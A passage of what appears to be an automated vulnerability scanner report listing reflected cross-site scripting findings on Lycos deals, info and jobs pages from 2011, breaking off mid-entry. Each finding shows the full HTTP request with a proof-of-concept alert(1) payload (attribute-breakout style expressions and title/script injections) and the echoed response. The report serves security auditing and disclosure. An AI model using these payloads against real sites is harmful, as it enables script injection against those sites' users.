<a href="?pn=2&amp;efe58"style="x:expression(alert(1))"08254d1432=1">
...[SNIP]...

1.260. http://deals.lycos.com/deals/category/pc-computers-47 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/pc-computers-47

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8d02"style%3d"x%3aexpression(alert(1))"d5642dc9aea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8d02"style="x:expression(alert(1))"d5642dc9aea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/pc-computers-47?f8d02"style%3d"x%3aexpression(alert(1))"d5642dc9aea=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:21:32 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 77092

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>PC Computers Deals, PC Com
...[SNIP]...
<a href="?pn=2&amp;f8d02"style="x:expression(alert(1))"d5642dc9aea=1">
...[SNIP]...

1.261. http://deals.lycos.com/deals/category/sports-and-fitness-211 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/sports-and-fitness-211

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 405f6"style%3d"x%3aexpression(alert(1))"d91b7e01036 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 405f6"style="x:expression(alert(1))"d91b7e01036 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/sports-and-fitness-211?405f6"style%3d"x%3aexpression(alert(1))"d91b7e01036=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75271

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Sports &amp; Fitness Deals
...[SNIP]...
<a href="?pn=2&amp;405f6"style="x:expression(alert(1))"d91b7e01036=1">
...[SNIP]...

1.262. http://deals.lycos.com/deals/category/televisions-159 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/televisions-159

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b2c"style%3d"x%3aexpression(alert(1))"4b1d9044497 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56b2c"style="x:expression(alert(1))"4b1d9044497 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/televisions-159?56b2c"style%3d"x%3aexpression(alert(1))"4b1d9044497=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:25 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 77288

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Televisions Deals, Televis
...[SNIP]...
<a href="?pn=2&amp;56b2c"style="x:expression(alert(1))"4b1d9044497=1">
...[SNIP]...

1.263. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/travel-and-entertainment-206

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce857"style%3d"x%3aexpression(alert(1))"4eb2c487c66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce857"style="x:expression(alert(1))"4eb2c487c66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/travel-and-entertainment-206?ce857"style%3d"x%3aexpression(alert(1))"4eb2c487c66=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75364

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Travel &amp; Entertainment
...[SNIP]...
<a href="?pn=2&amp;ce857"style="x:expression(alert(1))"4eb2c487c66=1">
...[SNIP]...

1.264. http://deals.lycos.com/deals/stores/buy-com-233 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/buy-com-233

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7777"style%3d"x%3aexpression(alert(1))"0aae570a8e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7777"style="x:expression(alert(1))"0aae570a8e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/buy-com-233?b7777"style%3d"x%3aexpression(alert(1))"0aae570a8e2=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76356

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Buy.com Deals, Buy.com Sal
...[SNIP]...
<a href="?pn=2&amp;b7777"style="x:expression(alert(1))"0aae570a8e2=1">
...[SNIP]...

1.265. http://deals.lycos.com/deals/stores/ebay-50 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/ebay-50

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 950e9"style%3d"x%3aexpression(alert(1))"0396bb4ae4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 950e9"style="x:expression(alert(1))"0396bb4ae4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/ebay-50?950e9"style%3d"x%3aexpression(alert(1))"0396bb4ae4a=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:56:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75658

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>eBay Deals, eBay Sales, eB
...[SNIP]...
<a href="?pn=2&amp;950e9"style="x:expression(alert(1))"0396bb4ae4a=1">
...[SNIP]...

1.266. http://deals.lycos.com/deals/stores/mwave-521 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/mwave-521

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16584"style%3d"x%3aexpression(alert(1))"c07f1c3e4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16584"style="x:expression(alert(1))"c07f1c3e4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/mwave-521?16584"style%3d"x%3aexpression(alert(1))"c07f1c3e4f=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:56:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75096

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>mwave Deals, mwave Sales,
...[SNIP]...
<a href="?pn=2&amp;16584"style="x:expression(alert(1))"c07f1c3e4f=1">
...[SNIP]...

1.267. http://deals.lycos.com/deals/stores/tigerdirect-597 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/tigerdirect-597

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5d02"style%3d"x%3aexpression(alert(1))"b40fd06c19d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5d02"style="x:expression(alert(1))"b40fd06c19d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/tigerdirect-597?b5d02"style%3d"x%3aexpression(alert(1))"b40fd06c19d=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:56:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76210

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>TigerDirect Deals, TigerDi
...[SNIP]...
<a href="?pn=2&amp;b5d02"style="x:expression(alert(1))"b40fd06c19d=1">
...[SNIP]...

1.268. http://deals.lycos.com/deals/stores/walmart-321 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/walmart-321

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb365"style%3d"x%3aexpression(alert(1))"303ad275b1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb365"style="x:expression(alert(1))"303ad275b1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/walmart-321?bb365"style%3d"x%3aexpression(alert(1))"303ad275b1f=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:46 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74747

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Walmart Deals, Walmart Sal
...[SNIP]...
<a href="?pn=2&amp;bb365"style="x:expression(alert(1))"303ad275b1f=1">
...[SNIP]...

1.269. http://info.lycos.com/tos.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 963e7"><script>alert(1)</script>1ea902f3967 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tos.php/963e7"><script>alert(1)</script>1ea902f3967 HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:22:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:22:09 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 91334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<a href="/tos.php/963e7"><script>alert(1)</script>1ea902f3967#acceptance">
...[SNIP]...

1.270. http://jobs.lycos.com/search [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

The value of the l request parameter is copied into the HTML document as text between TITLE tags. The payload 91b55</title><script>alert(1)</script>4bc6160af5e was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=&l=91b55</title><script>alert(1)</script>4bc6160af5e HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839803822; path=/
Date: Mon, 07 Feb 2011 15:24:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:31 GMT; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16555

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<title>Job listings in 91b55</title><script>alert(1)</script>4bc6160af5e on Lycos Jobs</title>
...[SNIP]...

1.271. http://jobs.lycos.com/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be3fc"style%3d"x%3aexpression(alert(1))"867ed00c325 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be3fc"style="x:expression(alert(1))"867ed00c325 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?q=Accounting+%2F+Finance&be3fc"style%3d"x%3aexpression(alert(1))"867ed00c325=1 HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839803822; path=/
Date: Mon, 07 Feb 2011 15:25:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:25:20 GMT; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/jobs/search?pn=2&amp;q=Accounting / Finance&amp;be3fc"style="x:expression(alert(1))"867ed00c325=1">
...[SNIP]...

1.272. http://jobs.lycos.com/search [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

The value of the q request parameter is copied into the HTML document as text between TITLE tags. The payload 2ee0f</title><script>alert(1)</script>889686a6c1d was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q={searchTerms}2ee0f</title><script>alert(1)</script>889686a6c1d&src=OS HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839803822; path=/
Date: Mon, 07 Feb 2011 15:23:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:23:23 GMT; path=/
Set-Cookie: PARTNER=os
Set-Cookie: PARTNER=deleted; expires=Sun, 07-Feb-2010 15:23:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<title>{searchTerms}2ee0f</title><script>alert(1)</script>889686a6c1d Jobs Near You on Lycos Jobs</title>
...[SNIP]...

1.273. http://jobs.lycos.com/search [x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

